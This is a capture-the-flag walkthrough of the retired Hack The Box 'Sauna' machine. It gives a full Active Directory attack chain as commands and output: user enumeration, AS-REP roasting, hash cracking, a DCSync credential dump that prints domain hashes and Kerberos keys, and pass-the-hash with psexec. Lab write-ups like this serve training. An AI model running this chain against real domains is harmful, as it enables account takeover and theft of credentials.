HTB Walkthrough: Sauna w/o Metasploit (retired)
Sauna is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Sauna| Difficulty Level: Easy | Operating System: Windows
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# nmap -sC -sV -oA Sauna 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–20 20:33 EDT
Nmap scan report for 10.10.10.175
Host is up (0.033s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021–05–21 07:49:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h15m21s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–05–21T07:49:08
|_ start_date: N/A
Enumeration
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# ldapsearch -h 10.10.10.175 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
##
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
When you browse to http://10.10.10.175/about.html you will get users. You can use the tool ‘Username Anarchy’.
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ./username-anarchy — input-file /home/kali/labs/HTB/Sauna/username.txt — select-format first,flast,first.last,f.last,firstl > unames.txt
Looking for valid usernames
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ./kerbrute userenum — dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /home/kali/labs/HTB/Sauna/unames.txt__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/Version: v1.0.3 (9dad6e1) — 05/22/21 — Ronnie Flathers @ropnop
2021/05/22 13:38:26 > Using KDC(s):
2021/05/22 13:38:26 > 10.10.10.175:882021/05/22 13:38:26 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2021/05/22 13:38:26 > Done! Tested 30 usernames (1 valid) in 0.071 seconds
Exploitation
Performing ASREPRoast. To know more about the attack, please read: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/GetNPUsers.py -request -no-pass egotistical-bank.local/fsmith -dc-ip 10.10.10.175
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:806235bbd4d102dacbbc41dad93176ba$fdeb0e861518254952ed3bdc8abe9d28e39c1d275e2583248d517bb204d712a61d6ba01f98b71a3f7293673dd3e8190798351865a0c06b0b5a3c15e389d96fd647be059d32025a8bab85d0b2632a29088d7e3f7f5b8a22f84a0607467bbac3f0ba50934b25c1f0e46a160633d5945eee10eb5702ad96eed4fbb390a259d14559020133e4002f4289150bb8b6aad90e3e790bfb80d5c48c0622241570488f7a30ba2f6928cbcbc476a6b431691e824598b6b1f30cf68820f4fa75a4556bd057f26c2c3c880092cb5422e35a799989d8976e87bb49e9d1ff9f2236e7a52e6e8c89522e3d8b69884102c76966f6544a6078e6d2e8b2cf25e5a8ea231d1fab5ea961
Cracking the password from the extracted hash using hashcat.
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# hashcat -m 18200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# hashcat -m 18200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt — show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:806235bbd4d102dacbbc41dad93176ba$fdeb0e861518254952ed3bdc8abe9d28e39c1d275e2583248d517bb204d712a61d6ba01f98b71a3f7293673dd3e8190798351865a0c06b0b5a3c15e389d96fd647be059d32025a8bab85d0b2632a29088d7e3f7f5b8a22f84a0607467bbac3f0ba50934b25c1f0e46a160633d5945eee10eb5702ad96eed4fbb390a259d14559020133e4002f4289150bb8b6aad90e3e790bfb80d5c48c0622241570488f7a30ba2f6928cbcbc476a6b431691e824598b6b1f30cf68820f4fa75a4556bd057f26c2c3c880092cb5422e35a799989d8976e87bb49e9d1ff9f2236e7a52e6e8c89522e3d8b69884102c76966f6544a6078e6d2e8b2cf25e5a8ea231d1fab5ea961:< password>
From nmap scan, evil-winrm was open. Logging into target using evil-winrm
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ruby evil-winrm.rb -u fsmith -p ‘<fsmith’s password>’ -i 10.10.10.175
And you will get a reverse shell + user flag.
Privilege Escalation
Running winpeas.exe to enumerate target. We found credentials for ‘svc_loanmanager’ account. Though the username is ‘svc_loanmgr’ (winpeas.exe results).
Using these credentials to login into target using evil-winrm and getting a reverse shell. Using BloodHound to enumerate Active Directory.
We can see that svc-loanmgr can perform DCSync.
Performing DC Sync.
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 — rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:5330c786160c2a4a943fcd7e9d9335f9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1–96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1–96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1–96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1–96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1–96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1–96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1–96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1–96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1–96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1–96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1–96:bd55bcb00f0b11f9393aca05f42fbf6f2ec5800d3dc048f5c35e8aadd474815f
SAUNA$:aes128-cts-hmac-sha1–96:ea926c26504647e0ec5e27c98146e28e
SAUNA$:des-cbc-md5:6720bc86926d6e3d
[*] Cleaning up…
Logging in using admin hash and getting a reverse shell + root flag.
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
